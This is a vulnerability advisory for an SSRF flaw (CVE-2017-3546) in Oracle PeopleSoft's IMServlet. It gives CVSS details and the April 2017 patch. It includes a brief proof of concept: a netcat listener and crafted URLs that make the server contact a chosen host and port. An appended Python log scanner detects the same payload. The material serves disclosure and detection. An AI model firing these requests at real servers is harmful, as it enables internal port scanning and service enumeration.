ERPSCAN-17-022: SSRF in PeopleSoft IMServlet

Published: 2016-12-23
Source: erpscan.io
EPSS: 0.008 (Low), percentile 82.2%

Application: Oracle PeopleSoft
Versions Affected: ToolsRelease: 8.55.03; ToolsReleaseDB: 8.55; PeopleSoft HCM 9.2
Vendor: Oracle
Bugs: SSRF
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Authors: Roman Shalymov (ERPScan)

VULNERABILITY INFORMATION

Class: SSRF
Impact: cross-site port attack, service enumeration
Remotely Exploitable: yes
Locally Exploitable: yes
CVE: CVE-2017-3546

CVSS Information

CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality Low (L)
I: Impact to Integrity Low (L)
A: Impact to Availability None (N)

VULNERABILITY DESCRIPTION

An attacker can force a vulnerable server to trigger malicious requests to third-party servers and/or to internal resources. This vulnerability can then be leveraged to launch specific attacks such as cross-site port attack, service enumeration, and various other attacks.

VULNERABLE PACKAGES

ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, apply the Oracle Critical Patch Update (CPU) of April 2017.

TECHNICAL DESCRIPTION

Proof of Concept

1. Start a listener on some host:

nc -l -p # on some host

2. In a browser, request:

http://PPLSOFTSRV:8000/IMServlet?Method=CONNECT
http://PPLSOFTSRV:8000/IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:OPEN_PORT/?param=var%23

3. Response in netcat:

GET /?param=var HTTP/1.1
User-Agent: Java1.7.0_95
Host: SOMEHOST:OPEN_PORT
Accept: text/html, image/gif, image/jpeg, */*; q=.2
Connection: Keep-Alive
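As an added defender-side example (not part of the ERPScan advisory), the following Python script scans web-server access logs for IMServlet requests whose im_server parameter shows the pattern of the PoC above: a host outside the expected IM servers, an internal address, an explicit port, or a smuggled path and "#" that redirects the servlet's outbound request. The log lines, the allowlist and the internal address are constructed assumptions.

```python
import re
from ipaddress import ip_address
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines for this example (not from the advisory). Line 2 has
# the PoC shape: im_server names an internal host:port and smuggles "/?...#" so the
# servlet's outbound request goes to a caller-chosen URL instead of the IM server.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Dec/2016:10:00:01 +0000] "GET /IMServlet?Method=CONNECT HTTP/1.1" 200 12
10.0.0.5 - - [23/Dec/2016:10:00:02 +0000] "GET /IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=192.168.1.10:22/?p=x%23 HTTP/1.1" 200 0
10.0.0.9 - - [23/Dec/2016:10:00:03 +0000] "GET /IMServlet?Method=GOOGLE_PRESENCE&im_to_user=bob&im_server_name=GOOGLE&im_server=talk.google.com HTTP/1.1" 200 50
"""
# Hosts the presence feature legitimately contacts (assumed allowlist; tune per site).
ALLOWED_IM_SERVERS = {"talk.google.com"}
REQUEST_RE = re.compile(r'"(?P<verb>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')


def classify_im_server(value):
    """Return the reasons a URL-decoded im_server value looks like SSRF abuse."""
    reasons = []
    if any(ch in value for ch in "/?#"):
        reasons.append("path, query or fragment smuggled into im_server")
    host, _, port = re.split(r"[/?#]", value, maxsplit=1)[0].partition(":")  # IPv4/hostname only
    if host not in ALLOWED_IM_SERVERS:
        reasons.append("host not in IM allowlist")
    if port:
        reasons.append("explicit port override (port-probe pattern)")
    try:
        if not ip_address(host).is_global:
            reasons.append("non-global address (internal target)")
    except ValueError:
        pass  # hostname, not an IP literal
    return reasons


def find_ssrf_attempts(log_text):
    """Return (client_ip, im_server, reasons) for suspicious IMServlet requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != "/IMServlet":
            continue
        for value in parse_qs(url.query).get("im_server", []):  # parse_qs URL-decodes %23
            reasons = classify_im_server(value)
            if reasons:
                hits.append((line.split(" ", 1)[0], value, reasons))
    return hits
```

Running find_ssrf_attempts(SAMPLE_LOG) flags only the second line, with all four reasons; the CONNECT request and the allowlisted talk.google.com lookup pass silently.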
